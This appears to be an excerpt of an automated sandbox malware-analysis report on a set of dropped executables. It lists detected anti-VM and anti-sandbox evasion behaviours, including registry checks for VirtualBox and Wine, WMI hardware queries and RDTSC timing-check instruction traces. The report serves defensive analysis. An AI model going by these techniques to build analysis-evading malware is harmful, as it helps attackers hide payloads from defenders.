Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: powershell.exe PID: 352, type: MEMORYSTR
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Stalling execution: Execution stalls by calling Sleep
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\1CMweaqlKp.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: toolspub1.exe, 00000031.00000002.2228738591.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7E22AF second address: 7E22B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7E22B3 second address: 7E22CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569C5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F59D3 second address: 7F59D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F59D9 second address: 7F59E3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D755569B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F5C99 second address: 7F5CA5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D7471B5DEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F5CA5 second address: 7F5CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jng 00007F0D755569B6h 0x00000013 popad 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F5CC1 second address: 7F5CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F5CC7 second address: 7F5CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F5CCD second address: 7F5CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F600E second address: 7F602E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D755569C9h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F602E second address: 7F604A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7471B5E6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F604A second address: 7F6050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F88DE second address: 7F88FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F0D7471B5DEh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F88FD second address: 7F8904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8948 second address: 7F8984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7471B5E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0D7471B5E2h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F0D7471B5D6h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8984 second address: 7F8A29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F0D755569BCh 0x0000000f jl 00007F0D755569B6h 0x00000015 popad 0x00000016 nop 0x00000017 mov dword ptr [ebp+122D1BDFh], edi 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D2D87h], ecx 0x00000025 or dl, FFFFFFE3h 0x00000028 push 4B0C8EAEh 0x0000002d jp 00007F0D755569CAh 0x00000033 push ebx 0x00000034 jmp 00007F0D755569C2h 0x00000039 pop ebx 0x0000003a xor dword ptr [esp], 4B0C8E2Eh 0x00000041 and edx, dword ptr [ebp+122D39C7h] 0x00000047 push 00000003h 0x00000049 mov edx, 0FCA41BAh 0x0000004e push 00000000h 0x00000050 mov ecx, dword ptr [ebp+122D3A87h] 0x00000056 push 00000003h 0x00000058 call 00007F0D755569C0h 0x0000005d mov dword ptr [ebp+122D1847h], esi 0x00000063 pop edx 0x00000064 mov dword ptr [ebp+122D3105h], eax 0x0000006a call 00007F0D755569B9h 0x0000006f push eax 0x00000070 push edx 0x00000071 jnc 00007F0D755569BCh 0x00000077 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8A29 second address: 7F8ABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7471B5E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 pop ebx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F0D7471B5DCh 0x0000001b mov eax, dword ptr [eax] 0x0000001d jng 00007F0D7471B5DCh 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push ecx 0x00000028 push eax 0x00000029 push edi 0x0000002a pop edi 0x0000002b pop eax 0x0000002c pop ecx 0x0000002d pop eax 0x0000002e call 00007F0D7471B5DDh 0x00000033 jo 00007F0D7471B5DCh 0x00000039 mov dword ptr [ebp+122D3168h], ecx 0x0000003f pop esi 0x00000040 add dword ptr [ebp+122D2F35h], ecx 0x00000046 lea ebx, dword ptr [ebp+1244D822h] 0x0000004c mov edx, 576335DFh 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F0D7471B5E9h 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8B4B second address: 7F8B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D755569C4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8B64 second address: 7F8BC8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D7471B5ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007F0D7471B5ECh 0x00000011 nop 0x00000012 sbb edx, 661256BFh 0x00000018 push 00000000h 0x0000001a sub dword ptr [ebp+122D30A3h], esi 0x00000020 call 00007F0D7471B5D9h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0D7471B5DDh 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8BC8 second address: 7F8C04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0D755569BAh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F0D755569BCh 0x00000013 pop edx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0D755569C7h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8C04 second address: 7F8C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D7471B5E9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8C21 second address: 7F8C30 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8D21 second address: 7F8D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8D25 second address: 7F8D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8D2B second address: 7F8D2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8DD5 second address: 7F8DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8DDC second address: 7F8ED5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0D7471B5E2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F0D7471B5DBh 0x00000010 nop 0x00000011 mov edx, esi 0x00000013 push 00000000h 0x00000015 mov edx, dword ptr [ebp+122D39E7h] 0x0000001b call 00007F0D7471B5D9h 0x00000020 jmp 00007F0D7471B5DDh 0x00000025 push eax 0x00000026 push eax 0x00000027 jmp 00007F0D7471B5DEh 0x0000002c pop eax 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 pushad 0x00000032 jmp 00007F0D7471B5E2h 0x00000037 jns 00007F0D7471B5DCh 0x0000003d popad 0x0000003e mov eax, dword ptr [eax] 0x00000040 jg 00007F0D7471B5F0h 0x00000046 pushad 0x00000047 jmp 00007F0D7471B5E6h 0x0000004c pushad 0x0000004d popad 0x0000004e popad 0x0000004f mov dword ptr [esp+04h], eax 0x00000053 jnl 00007F0D7471B5E0h 0x00000059 pop eax 0x0000005a mov cx, si 0x0000005d push 00000003h 0x0000005f ja 00007F0D7471B5DCh 0x00000065 mov dword ptr [ebp+122D32CFh], ebx 0x0000006b push 00000000h 0x0000006d mov edi, dword ptr [ebp+122D39D7h] 0x00000073 jmp 00007F0D7471B5DAh 0x00000078 push 00000003h 0x0000007a mov ecx, edx 0x0000007c call 00007F0D7471B5D9h 0x00000081 jng 00007F0D7471B5E4h 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a push esi 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8ED5 second address: 7F8EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8EDA second address: 7F8F26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7471B5E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ecx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pop ecx 0x00000013 mov eax, dword ptr [eax] 0x00000015 push esi 0x00000016 jmp 00007F0D7471B5E8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 pushad 0x00000021 push ecx 0x00000022 pushad 0x00000023 popad 0x00000024 pop ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 pop edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F8F26 second address: 7F8F5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b adc cx, 0876h 0x00000010 lea ebx, dword ptr [ebp+1244D836h] 0x00000016 call 00007F0D755569C2h 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 80B79D second address: 80B7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 80B7A3 second address: 80B7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 80B7AB second address: 80B7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F0D7471B5EBh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 81793E second address: 817944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817944 second address: 81794A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
